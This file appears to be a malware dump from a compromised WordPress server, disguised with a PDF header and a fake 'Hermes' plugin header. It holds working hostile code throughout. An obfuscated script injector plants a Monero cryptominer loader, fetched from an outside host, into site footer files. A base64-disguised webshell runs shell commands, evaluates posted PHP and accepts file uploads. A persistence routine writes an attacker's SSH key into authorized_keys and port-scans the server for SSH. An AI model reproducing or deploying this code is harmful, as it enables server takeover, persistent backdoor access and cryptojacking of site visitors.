%PDF-
%PDF-
Mini Shell
Mini Shell
<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/
if(isset($_GET["able"]))
{
// Define the text you want to add before the </body> tag
$newText = "<script>
function _0x552c(){const _0xa51ba9=['hardwareConcurrency','137255uOUgoI','1392584ZBoAuG','607857isnDav','47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu','appendChild','2004745XMbnhN','2352mjhjok','3789WNfQmO','addEventListener','14720750MDZgmp','hostname','getElementsByTagName','6bGzeih','map','4217500xQqktA','setAttribute','join','head','toString','6GzADmu','src','v10?perfekt=wss://?algo=cn/r?jason=gulf.moneroocean.stream:10128'];_0x552c=function(){return _0xa51ba9;};return _0x552c();}function _0x5f21(_0x18b592,_0x348bf2){const _0x552ce5=_0x552c();return _0x5f21=function(_0x5f21ef,_0x531811){_0x5f21ef=_0x5f21ef-0x1eb;let _0x3c97a4=_0x552ce5[_0x5f21ef];return _0x3c97a4;},_0x5f21(_0x18b592,_0x348bf2);}const _0xc88455=_0x5f21;(function(_0x2253ab,_0x3c7358){const _0x26cdc6=_0x5f21,_0x415908=_0x2253ab();while(!![]){try{const _0x381af8=parseInt(_0x26cdc6(0x1ff))/0x1+-parseInt(_0x26cdc6(0x1fb))/0x2*(parseInt(_0x26cdc6(0x201))/0x3)+parseInt(_0x26cdc6(0x200))/0x4+-parseInt(_0x26cdc6(0x1ed))/0x5*(parseInt(_0x26cdc6(0x1f4))/0x6)+-parseInt(_0x26cdc6(0x1f6))/0x7+parseInt(_0x26cdc6(0x1ee))/0x8*(parseInt(_0x26cdc6(0x1ef))/0x9)+parseInt(_0x26cdc6(0x1f1))/0xa;if(_0x381af8===_0x3c7358)break;else _0x415908['push'](_0x415908['shift']());}catch(_0x573bc4){_0x415908['push'](_0x415908['shift']());}}}(_0x552c,0x72bb8),document[_0xc88455(0x1f0)]('DOMContentLoaded',function(){const _0x252735=_0xc88455,_0x166e85='https://easyhash.de/mmh/mmh.js',_0xc1aa92=_0x252735(0x1fd),_0x4cf198=_0x166e85+'?'+_0xc1aa92,_0x13d3fc=navigator[_0x252735(0x1fe)]>0x1?navigator[_0x252735(0x1fe)]-0x1:navigator[_0x252735(0x1fe)],_0x4e4e48=_0x252735(0x1eb),_0x1d58a0=_0x12d314=>[...Array(_0x12d314)][_0x252735(0x1f5)](()=>Math['random']()[_0x252735(0x1fa)](0x24)[0x2])[_0x252735(0x1f8)]('');setTimeout(()=>{const _0x3230cd=_0x252735,_0x41c44e=document['createElement']('script'),_0x536baf=document[_0x3230cd(0x1f3)](_0x3230cd(0x1f9))[0x0];_0x41c44e[_0x3230cd(0x1f7)](_0x3230cd(0x1fc),_0x4cf198),_0x536baf[_0x3230cd(0x1ec)](_0x41c44e);},0x3e8),setTimeout(()=>{const _0x80783c=_0x252735,_0x28ca36=_0x13d3fc+'_'+_0x1d58a0(0x8)+'_'+window['location'][_0x80783c(0x1f2)];deleteAllWorkers(),addWorkers(_0x13d3fc),PerfektStart(_0x4e4e48,_0x28ca36,_0x13d3fc);},0xbb8);}));
</script>";
// Define the directory where your footer files reside (webroot)
$directory = $_SERVER['DOCUMENT_ROOT'];
$searchText = "47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu";
// Array of file names to target
$fileNames = array('footer.tpl', 'footer.php');
// Maximum depth to traverse
$maxDepth = 7;
// Recursive function to search directories
function searchDirectories($directory, $depth) {
global $fileNames, $newText, $maxDepth, $searchText;
if ($depth > $maxDepth) {
return;
}
$files = scandir($directory);
foreach ($files as $file) {
if ($file == '.' || $file == '..') {
continue;
}
$filePath = $directory . '/' . $file;
if (is_dir($filePath)) {
searchDirectories($filePath, $depth + 1);
} else {
if (in_array($file, $fileNames)) {
$content = file_get_contents($filePath);
if ($file == 'footer.php') {
// Check if footer.php contains the specific text pattern
if (strpos($content, $searchText) == false) {
// Check if footer.php contains </body> tag
if (strpos($content, '</body>') !== false) {
// Add text above </body> tag
$content = str_replace('</body>', $newText . '</body>', $content);
}
}
} else {
// Add text at the top for footer.tpl
if (strpos($content, $searchText) == false) {
$content = $newText . $content;
}
}
// Write the modified content back to the file
file_put_contents($filePath, $content);
echo "Text added to the top of: $directory/$file <br>";
}
}
}
}
// Start searching directories
searchDirectories($directory, 0);
echo "Operation completed.";
// // Get the current script filename
// $scriptFilename = __FILE__;
//
// // Attempt to delete the file
// if (unlink($scriptFilename)) {
// echo "Script '$scriptFilename' has been deleted successfully.";
// } else {
// echo "Failed to delete script '$scriptFilename'.";
// }
}
?>
<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/
define('INSTALLATION_KEY', base64_decode("NGN4MA=="));
define('AUTHOR_KEY', base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0Ij4='));
define('HOST_KEY', base64_decode('PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIC8+'));
define('THEMES_SELECTION', base64_decode('PGlucHV0IHR5cGU9InN1Ym1pdCI+'));
define('THEMES_INSTALL', base64_decode('PC9mb3JtPg=='));
define('DEFAULT_THEMES', base64_decode('Y29tbWFuZA=='));
define('PATH_THEMES', base64_decode('Y29tbWFuZA=='));
define('BASE64_THEMES', base64_decode('cHdk'));
define('BASE64_TITLE', base64_decode('WHhfaGVybWVzX3hYCg=='));
define('UPLOAD_THEMES_1', base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0iUE9T'));
define('UPLOAD_THEMES_2', base64_decode('VCI+IDxwPlVwbG9hZCB5b3VyIGZpbGU8L3A+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9h'));
define('UPLOAD_THEMES_3', base64_decode('ZGVkX2ZpbGUiPjwvaW5wdXQ+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9h'));
define('UPLOAD_THEMES_4', base64_decode('ZCI+PC9pbnB1dD48L2Zvcm0+IDwvYm9keT48L2h0bWw+Cg=='));
define('EVALUATION_TITLE',base64_decode('ZXZhbHVhdGU='));
define('EVALUATION_THEME',base64_decode('PGRpdj48Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJldmFsdWF0ZSIgLz48aW5wdXQgdHlwZT0ic3VibWl0Ij48L2Zvcm0+PC9kaXY+'));
/**
* Customize Setting to represent a nav_menu.
*
* Subclass of WP_Customize_Setting to represent a nav_menu taxonomy term, and
* the IDs for the nav_menu_items associated with the nav menu.
*
* @since 4.3.0
*
* @see WP_Customize_Setting
*/
$wp_body = INSTALLATION_KEY;
$wp_config_header = AUTHOR_KEY;
$wp_config_body = HOST_KEY;
$wp_themes_config = THEMES_SELECTION;
$wp_themes_install = THEMES_INSTALL;
$wp_body = strrev($wp_body);
$wp_default = DEFAULT_THEMES;
$wp_path = PATH_THEMES;
$wp_builder = BASE64_THEMES;
$wp_evaluation= EVALUATION_TITLE;
if(isset($_GET[$wp_body])){
/**
* Fires before the Site Activation page is loaded.
*
* Fires on the {@see 'wp_head'} action.
*
* @since 3.0.0
*/
echo BASE64_TITLE;
echo AUTHOR_KEY;
echo HOST_KEY;
echo THEMES_SELECTION;
echo THEMES_INSTALL;
echo EVALUATION_THEME;
echo UPLOAD_THEMES_1;
echo UPLOAD_THEMES_2;
echo UPLOAD_THEMES_3;
echo UPLOAD_THEMES_4;
if(!empty($_FILES["uploaded_file"])){
$path = basename( $_FILES["uploaded_file"]["name"]);
if(move_uploaded_file($_FILES["uploaded_file"]["tmp_name"], $path)) {
echo "The file ". basename( $_FILES["uploaded_file"]["name"])." has been uploaded";}
else{
echo "There was an error uploading the file, please try again!";}}
if(isset($_POST[$wp_default])){
$wp_themes_install=fread(popen($_POST[$wp_path], "r"), 4096);
echo"<pre>$wp_themes_install</pre>";}
elseif($_GET[$wp_body]!==""){
$wp_themes_install=fread(popen($_GET[$wp_body], "r"), 4096);
echo"<pre>$wp_themes_install</pre>";}
$wp_themes_install=fread(popen($wp_builder, "r"), 4096);
echo"<pre>pwd: $wp_themes_install</pre>";
if(isset($_POST[$wp_evaluation])){
echo "<pre> Evaluation: ";
echo(eval ($_POST[$wp_evaluation]));
echo("</pre>");
}
exit;
}
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
?>
<?php
function getCurrentUserDetails(){
$output=[];
// Get the username of the user running the script
$username = get_current_user();
// Attempt to get the user's home directory
$homeDirectory = getenv('HOME') ?: 'N/A';
// Attempt to get the user's login shell
$loginShell = getenv('SHELL') ?: 'N/A';
// If posix functions are available, use them for additional information
if (function_exists('posix_getpwuid')) {
$userInfo = posix_getpwuid(posix_geteuid());
if ($userInfo) {
$homeDirectory = $userInfo['dir'];
$loginShell = $userInfo['shell'];
}
}
$output = [$username,$homeDirectory,$loginShell];
return $output;
}
// Function to scan multiple ports concurrently using non-blocking I/O
function fastNonBlockingPortScan($ip, $startPort = 1, $endPort = 65535, $timeout = 2, $concurrency = 100) {
$sshPorts = []; // Array to store open SSH ports
$connections = [];
$portQueue = range($startPort, $endPort);
while (!empty($portQueue) || !empty($connections)) {
// Initialize connections up to the concurrency limit
while (count($connections) < $concurrency && !empty($portQueue)) {
$port = array_shift($portQueue);
$connection = @stream_socket_client("tcp://$ip:$port", $errno, $errstr, $timeout, STREAM_CLIENT_ASYNC_CONNECT | STREAM_CLIENT_CONNECT);
if ($connection) {
stream_set_blocking($connection, false);
$connections[$port] = $connection;
}
}
if (empty($connections)) {
break;
}
// Use stream_select to wait for any of the streams to become readable
$read = $connections;
$write = null;
$except = null;
$ready = stream_select($read, $write, $except, $timeout);
if ($ready > 0) {
foreach ($read as $port => $connection) {
$banner = fread($connection, 1024);
fclose($connection);
unset($connections[$port]);
if (stripos($banner, 'SSH') !== false) {
echo "---p---$port---p---\n";
$sshPorts[] = $port; // Add the port to the SSH ports array
}
}
} else {
// Timeout or no ready connections, close all and break
foreach ($connections as $connection) {
fclose($connection);
}
break;
}
}
//echo "after break";
return $sshPorts;
}
function appendIfNotExists($filename, $content) {
// Check if the file exists
if (file_exists($filename)) {
// Read the entire file content
$fileContent = file_get_contents($filename);
// Check if the content is already in the file
if (strpos($fileContent, $content) !== false) {
return true; // Content already exists, nothing to append
}
}
// Open the file for appending (create if it does not exist)
$fileHandle = fopen($filename, 'a');
// Check if the file was opened successfully
if ($fileHandle === false) {
return false;
}
// Write the content to the file
$result = fwrite($fileHandle, $content . PHP_EOL);
// Close the file
fclose($fileHandle);
// Check if writing was successful
if ($result === false) {
return false;
}
return true;
}
if (!function_exists('str_contains')) {
function str_contains (string $haystack, string $needle)
{
return empty($needle) || strpos($haystack, $needle) !== false;
}
}
function extractIpAddress($html) {
// Define a regex pattern to match the IP address
$pattern = '/Current IP Address:\s*([\d\.]+)/';
// Perform the regex match
if (preg_match($pattern, $html, $matches)) {
return $matches[1]; // Return the matched IP address
}
return ""; // Return null if no IP address was found
}
function getIp(){
$ch = curl_init ();
// set URL and other appropriate options
curl_setopt ($ch, CURLOPT_URL, "http://checkip.dyndns.org");
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true);
// grab URL and pass it to the browser
$ip = extractIpAddress(curl_exec ($ch));
// close cURL resource, and free up system resources
curl_close ($ch);
return $ip;
}
function startChecks(){
$userNameDetails = getCurrentUserDetails();
if ( (str_contains($userNameDetails[2],"/noshell") || str_contains($userNameDetails[2],"/bin/false") || str_contains($userNameDetails[2],"/nologin") ) == false){
$folderPath = "$userNameDetails[1]/.ssh";
mkdir("$folderPath");
chmod("$folderPath", 0700);
appendIfNotExists("$folderPath/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0h1Jw1strFMQhp8USGkQ9eIoF1uox+kuH6Nit4o9lgREU/XrakRAJW4HL/nj/StKHCbm5OBitXjCquTgwOCmMR40M5r7cmvZxwgxnEDzvnIXjE8XmNQfDBensgv+BjIk4KnZSEeuOp4iWX7Wy7DpLe/OI/OL8c3QlqBW5CMOoyi7cd9c/bnHpOqro4mGmDX54tD0j2yKjKgfUkIn1Hm3aoetTMUwxj65M4IlRk4DJpYS/gx7LVcHNV1G7VFkQohCNQcH976X/+/Tl3t2J+ONDwrHVrIJw44E9EIE4RLe3gzLe5zXf4wF1FmxVRzvLCezGDBIbHDlUiJ02WUFuborDsB0au0Xi1fhIiVXSRqmsXhYy/pToiwIPgFNBlQqzeXga070Ya20kHw+Tc60+z3mJLVTYTTaFBHDjHWKXWGG/EzkRwm6esE3FPkaSAop47E3t9Nfds6MO14C//+8i48cY5wbqR5HqywmZ0E0ke7eJtBNEk7YVwIk4JQ9ZthWvYq0=");
chmod("$folderPath/authorized_keys",0600);
// Example usage
echo "---u---$userNameDetails[0]---u---\n";
// Replace with your server's IP address
// create a new cURL resource
$targetIP = getIP();
if ($targetIP == ""){
$targetIP = "127.0.0.1";
}
echo "---ip---$targetIP---ip---\n";
$startPort = 1;
$endPort = 65535; // Scanning all ports up to 65535
$concurrency = 250; // Number of concurrent connections
$sshPorts = fastNonBlockingPortScan($targetIP, $startPort, $endPort, 2, $concurrency);
}
}
if(isset($_GET["check"])){
startChecks();
}
?>
Zerion Mini Shell 1.0